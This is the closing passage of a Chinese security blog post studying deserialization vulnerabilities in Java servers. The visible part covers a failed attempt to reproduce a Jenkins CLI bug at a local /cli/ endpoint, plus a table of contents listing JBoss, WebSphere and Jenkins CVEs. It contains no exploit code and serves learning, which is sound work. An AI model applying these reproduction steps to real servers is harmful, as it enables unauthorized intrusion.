<p><a href="https://www.anquanke.com/post/id/86018" target="_blank" rel="noopener">https://www.anquanke.com/post/id/86018</a></p>
<p>下载地址<a href="https://www.newasp.net/soft/278992.html" target="_blank" rel="noopener">https://www.newasp.net/soft/278992.html</a></p>
<p>直接下载安装自动在8080启动服务：</p>
<p><img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578486370688.png" alt="1578486370688"></p>
<p>漏洞点<a href="http://localhost:8080/cli/" target="_blank" rel="noopener">http://localhost:8080/cli/</a></p>
<p>cli断点在登录后可看到。POC使用未能成功（测试的JDK为1.8.202）</p>
<p><img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578488828260.png" alt="1578488828260"></p>
<p><img src="/2020/01/08/JAVA相关容器序列化漏洞学习/1578488844395.png" alt="1578488844395"></p>
<p>未成功弹出计算器，参照了<a href="https://www.anquanke.com/post/id/86018" target="_blank" rel="noopener">https://www.anquanke.com/post/id/86018</a>的POC</p>
<h1 id="Weblogic"><a href="#Weblogic" class="headerlink" title="Weblogic"></a>Weblogic</h1><p>太熟悉暂时不分析。等新的Weblogic漏洞出来了再仔细看看。</p>

      
    </div>
    
    
    

    <div>
    
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

  <!-- JS库 sweetalert 可修改路径 -->
  <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
  <script src="https://cdn.bootcss.com/sweetalert/2.1.2/sweetalert.min.js"></script>
  <link rel="stylesheet" type="text/css" href="https://cdn.bootcss.com/sweetalert/1.1.2/sweetalert.min.css">

  <p><span>本文标题:</span>JAVA相关容器序列化漏洞学习</p>
  <p><span>文章作者:</span>laker</p>
  <p><span>发布时间:</span>2020年01月08日 - 19:26:37</p>
  <p><span>最后更新:</span>2020年01月13日 - 14:32:22</p>
  <p><span>原始链接:</span><a href="/2020/01/08/JAVA相关容器序列化漏洞学习/" title="JAVA相关容器序列化漏洞学习">http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/</a>
    <span class="copy-path" title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="http://laker.xyz/2020/01/08/JAVA相关容器序列化漏洞学习/" aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>
</div>
<script>
    var clipboard = new Clipboard('.fa-clipboard');
    clipboard.on('success', $(function(){
      $(".fa-clipboard").click(function(){
        swal({
          title: "",
          text: '复制成功',
          html: false,
          timer: 500,
          showConfirmButton: false
        });
      });
    }));
</script>

    
    </div>

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/代码审计/" rel="tag"># 代码审计</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/01/06/Fastjson1-2-61鸡肋的反序列化/" rel="next" title="Fastjson1.2.61鸡肋的反序列化">
                <i class="fa fa-chevron-left"></i> Fastjson1.2.61鸡肋的反序列化
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/01/14/安卓手机微信7-0-4调试小程序抓包https请求失败问题和解决/" rel="prev" title="安卓手机微信7.0.4调试小程序抓包https请求失败问题和解决">
                安卓手机微信7.0.4调试小程序抓包https请求失败问题和解决 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">laker</p>
              <p class="site-description motion-element" itemprop="description">有幸，欢迎</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">41</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.th3wind.xyz" title="th3wind" target="_blank">th3wind</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://damit5.com/" title="damit5" target="_blank">damit5</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#Tomcat-服务器"><span class="nav-number">1.</span> <span class="nav-text">Tomcat 服务器</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Jetty"><span class="nav-number">1.1.</span> <span class="nav-text">Jetty</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Resin-服务器"><span class="nav-number">1.2.</span> <span class="nav-text">Resin 服务器</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#JBoss服务器-–（曾有反序列化漏洞）"><span class="nav-number">1.3.</span> <span class="nav-text">JBoss服务器 –（曾有反序列化漏洞）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#WebSphere-服务器-–（曾有反序列化漏洞）"><span class="nav-number">1.4.</span> <span class="nav-text">WebSphere 服务器 –（曾有反序列化漏洞）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#WebLogic-服务器-–（曾有反序列化漏洞）"><span class="nav-number">1.5.</span> <span class="nav-text">WebLogic 服务器 –（曾有反序列化漏洞）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Jekin应用-–（曾有反序列化漏洞）-不是容器而是应用，可部署到容器"><span class="nav-number">1.6.</span> <span class="nav-text">Jekin应用 –（曾有反序列化漏洞） 不是容器而是应用，可部署到容器</span></a></li></ol></li></ol><li class="nav-item nav-level-1"><a class="nav-link" href="#Jboss"><span class="nav-number"></span> <span class="nav-text">Jboss</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2017-12149"><span class="nav-number"></span> <span class="nav-text">CVE-2017-12149</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#影响的版本"><span class="nav-number"></span> <span class="nav-text">影响的版本</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞关联"><span class="nav-number">1.</span> <span class="nav-text">漏洞关联</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#复现"><span class="nav-number">1.1.</span> <span class="nav-text">复现</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#WebSphere"><span class="nav-number"></span> <span class="nav-text">WebSphere</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2015-7450"><span class="nav-number"></span> <span class="nav-text">CVE-2015-7450</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Jekins"><span class="nav-number"></span> <span class="nav-text">Jekins</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2016-9299"><span class="nav-number"></span> <span class="nav-text">CVE-2016-9299</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2017-1000353"><span class="nav-number"></span> <span class="nav-text">CVE-2017-1000353</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Weblogic"><span class="nav-number"></span> <span class="nav-text">Weblogic</span></a></li></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">laker</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



    <br>
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">本站访客数<span id="busuanzi_value_site_uv"></span>人</span>


        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
